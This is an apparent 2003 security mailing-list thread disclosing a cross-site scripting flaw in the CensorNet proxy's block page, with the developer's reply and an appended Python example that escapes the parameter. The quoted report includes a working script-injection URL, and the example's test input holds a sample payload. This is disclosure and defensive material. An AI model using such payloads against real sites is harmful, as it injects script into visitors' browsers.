Date: Mon, 27 Oct 2003 09:18:58 -0000
From: "Dan Searle" <dan.searle@...lix.com>
To: "Richard Maudsley" <maudr001@...m.org>,
	"David Wright" <wrigd006@...m.org>
Cc: <bugtraq@...urityfocus.com>, <frenw001@...m.org>
Subject: Re: CensorNet: Cross Site Scripting Vulnerability


Hi People,

I'm Dan, the main developer for CensorNet. I don't consider this issue to be
a vulnerability of any kind, however, we will endeavour (for completeness)
to stop people from being able to insert script into the "Access Denied"
page on CensorNet. If anyone could enlighten me as to a situation where this
"vulnerability" would actually become dangerous in a practical situation
then please feel free.

Regards, Dan...

----- Original Message ----- 
From: "David Wright" <wrigd006@...m.org>
To: "Richard Maudsley" <maudr001@...m.org>
Cc: <bugtraq@...urityfocus.com>; <support@...lix.com>; <frenw001@...m.org>
Sent: Saturday, October 25, 2003 4:47 PM
Subject: Re: CensorNet: Cross Site Scripting Vulnerability


> Richard.
>
> Sorry I haven't replied. I have been ill towards the end of the week.
>
> If you get a response from Adelix (they have taken over Intrago) can you
> let us know.
>
> Regards
>
> Dave
> "Richard Maudsley" <maudr001@...m.org> writes:
> >Hello,
> >
> >A cross site scripting vulnerability exists in the CensorNet Proxy Service
> >(www.censornet.com) that allows scripting (and html) to be passed to the
> >cgi script and displayed in the web browser.
> >
> >Exploit:
>
> >http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>
> >
> >Regards,
> > Richard Maudsley
>
>
> David Wright
>
> Royal Borough of Windsor and Maidenhead
> -WAMIE (FirstClass) Technical Support Co-ordinator
>
> The Windsor Boys' School
> -SIMS Manager
>
> 1 Maidenhead Road, Windsor, Berkshire, SL4 5EH
>
> E-Mail: wrigd006@...m.org
> Work: 01753 716083
> Fax: 01753 833186
> Mobile:
>
>
> - -------------------------------------------------------------------
>     This email has been sent from the Royal Borough of Windsor and
>     Maidenhead LEA system, if you have cause for complaint regarding the
>     content of this email please contact abuse@...m.org
> - -------------------------------------------------------------------
>
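
Added example, not part of the original thread and not CensorNet's code: one way a block page can treat the DENIEDURL parameter as untrusted text, escaping it for HTML output and only turning it into a link when it has an ordinary web scheme. The template, the function names, the allowed-scheme list, the Content-Security-Policy header and the sample inputs are all assumptions constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Hypothetical block-page template; the thread does not show CensorNet's markup.
PAGE = (
    "<html><body><h1>Access Denied</h1>\n"
    '<p>Blocked URL: <a href="{href}">{text}</a></p>\n'
    "</body></html>"
)

# Assumed policy: only these schemes may become a clickable link.
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def render_denied_page(denied_url: str) -> str:
    """Build the block page, treating DENIEDURL as untrusted text."""
    # Escape & < > " ' so markup in the parameter is displayed, not parsed.
    text = html.escape(denied_url, quote=True)
    # Attribute context: link only when the value has an allowed scheme;
    # anything else (javascript:, data:, stray markup) gets an inert href.
    try:
        scheme = urlsplit(denied_url).scheme.lower()
    except ValueError:
        scheme = ""
    href = text if scheme in ALLOWED_SCHEMES else "#"
    return PAGE.format(href=href, text=text)


def handle_request(query_string: str):
    """Return (headers, body) for a CGI request carrying DENIEDURL."""
    params = parse_qs(query_string, keep_blank_values=True)
    denied_url = params.get("DENIEDURL", [""])[0]
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # Defence in depth: if escaping is ever missed, inline script
        # still will not execute in browsers that enforce CSP.
        ("Content-Security-Policy", "default-src 'none'"),
    ]
    return headers, render_denied_page(denied_url)


# Constructed sample query strings (URL-encoded, as a browser would send them).
SAMPLE_MARKUP = "DENIEDURL=%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E"
SAMPLE_NORMAL = "DENIEDURL=http%3A//blocked.example/%3Fa%3D1%26b%3D2"

if __name__ == "__main__":
    for qs in (SAMPLE_MARKUP, SAMPLE_NORMAL):
        print(handle_request(qs)[1], end="\n\n")
```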
